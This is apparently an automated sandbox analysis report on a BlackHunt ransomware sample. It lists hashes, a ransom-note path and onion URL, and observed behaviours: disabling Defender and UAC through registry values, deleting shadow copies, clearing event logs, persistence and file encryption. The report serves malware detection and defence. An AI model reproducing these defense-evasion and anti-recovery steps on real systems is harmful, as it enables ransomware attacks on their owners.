Analysis
-
max time kernel
135s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:30
Static task
static1
Behavioral task
behavioral1
Sample
ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe
Resource
win10v2004-20231215-en
General
-
Target
ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe
-
Size
707KB
-
MD5
b51c415ebef463bc5fd6067a4e61e4c4
-
SHA1
de476dc342c9402936cbf25847cc7788a4451421
-
SHA256
ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a
-
SHA512
5f493ee8b8d15157fa69064b2a42387e3c699b594473bc0eabaeb8edaa2adae5353565bb0d7664486860e65797be7535bfc1a0598d7f175247287807103de269
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza128nvnh:6uaTmkZJ+naie5OTamgEoKxLWlvh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6652 fsutil.exe 12740 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 12992 wevtutil.exe 7580 wevtutil.exe 12672 wevtutil.exe 8132 wevtutil.exe 6832 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6148 bcdedit.exe 5904 bcdedit.exe 14060 bcdedit.exe 4464 bcdedit.exe -
Renames multiple (3395) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7104 wbadmin.exe 12664 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\Z: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\I: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\P: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\T: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\K: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\X: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\H: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\J: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\M: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\L: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\N: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\U: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\V: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\Q: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\Y: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\B: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\W: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\O: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened (read-only) \??\G: ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons.png ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\ui-strings.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\ui-strings.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\ui-strings.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\ui-strings.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoInternetConnection_120x80.svg ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugin.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\management\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\cacerts ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files\DismountSplit.csv ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small2x.png ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\ui-strings.js ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main-selector.css ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\charsets.jar ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-default_32.svg ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\share.svg ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode-2x.png ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\#BlackHunt_ReadMe.hta ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_ReadMe.txt ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#BlackHunt_Private.key ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 9596 12412 WerFault.exe 293 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1804 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7436 vssadmin.exe 5368 vssadmin.exe 2748 vssadmin.exe 2444 vssadmin.exe 1760 vssadmin.exe 8736 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 13532 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 Conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 13496 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Token: SeRestorePrivilege 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Token: SeBackupPrivilege 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Token: SeTakeOwnershipPrivilege 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Token: SeAuditPrivilege 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Token: SeSecurityPrivilege 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Token: SeIncBasePriorityPrivilege 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Token: SeBackupPrivilege 1540 vssvc.exe Token: SeRestorePrivilege 1540 vssvc.exe Token: SeAuditPrivilege 1540 vssvc.exe Token: SeBackupPrivilege 7648 wbengine.exe Token: SeRestorePrivilege 7648 wbengine.exe Token: SeSecurityPrivilege 7648 wbengine.exe Token: SeSecurityPrivilege 12672 wevtutil.exe Token: SeBackupPrivilege 12672 wevtutil.exe Token: SeSecurityPrivilege 8132 wevtutil.exe Token: SeBackupPrivilege 8132 wevtutil.exe Token: SeSecurityPrivilege 6832 wevtutil.exe Token: SeBackupPrivilege 6832 wevtutil.exe Token: SeSecurityPrivilege 12992 wevtutil.exe Token: SeBackupPrivilege 12992 wevtutil.exe Token: SeSecurityPrivilege 7580 wevtutil.exe Token: SeBackupPrivilege 7580 wevtutil.exe Token: SeDebugPrivilege 13532 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3420 wrote to memory of 2356 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 203 PID 3420 wrote to memory of 2356 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 203 PID 3420 wrote to memory of 2096 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 115 PID 3420 wrote to memory of 2096 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 115 PID 3420 wrote to memory of 1604 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 114 PID 3420 wrote to memory of 1604 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 114 PID 3420 wrote to memory of 2404 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 113 PID 3420 wrote to memory of 2404 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 113 PID 3420 wrote to memory of 4036 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 111 PID 3420 wrote to memory of 4036 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 111 PID 2356 wrote to memory of 968 2356 cmd.exe 110 PID 2356 wrote to memory of 968 2356 cmd.exe 110 PID 3420 wrote to memory of 5040 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 109 PID 3420 wrote to memory of 5040 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 109 PID 2096 wrote to memory of 3348 2096 cmd.exe 157 PID 2096 wrote to memory of 3348 2096 cmd.exe 157 PID 1604 wrote to memory of 4056 1604 cmd.exe 106 PID 1604 wrote to memory of 4056 1604 cmd.exe 106 PID 3420 wrote to memory of 532 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 105 PID 3420 wrote to memory of 532 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 105 PID 2404 wrote to memory of 3836 2404 cmd.exe 167 PID 2404 wrote to memory of 3836 2404 cmd.exe 167 PID 3420 wrote to memory of 4940 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 99 PID 3420 wrote to memory of 4940 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 99 PID 4036 wrote to memory of 1916 4036 cmd.exe 98 PID 4036 wrote to memory of 1916 4036 cmd.exe 98 PID 5040 wrote to memory of 3384 5040 cmd.exe 94 PID 5040 wrote to memory of 3384 5040 cmd.exe 94 PID 3420 wrote to memory of 1368 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 97 PID 3420 wrote to memory of 1368 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 97 PID 3420 wrote to memory of 4580 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 95 PID 3420 wrote to memory of 4580 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 95 PID 3420 wrote to memory of 1804 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 181 PID 3420 wrote to memory of 1804 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 181 PID 4940 wrote to memory of 2840 4940 cmd.exe 118 PID 4940 wrote to memory of 2840 4940 cmd.exe 118 PID 3420 wrote to memory of 468 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 119 PID 3420 wrote to memory of 468 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 119 PID 532 wrote to memory of 3580 532 cmd.exe 130 PID 532 wrote to memory of 3580 532 cmd.exe 130 PID 1368 wrote to memory of 4204 1368 cmd.exe 129 PID 1368 wrote to memory of 4204 1368 cmd.exe 129 PID 3420 wrote to memory of 2144 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 128 PID 3420 wrote to memory of 2144 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 128 PID 4580 wrote to memory of 2684 4580 cmd.exe 126 PID 4580 wrote to memory of 2684 4580 cmd.exe 126 PID 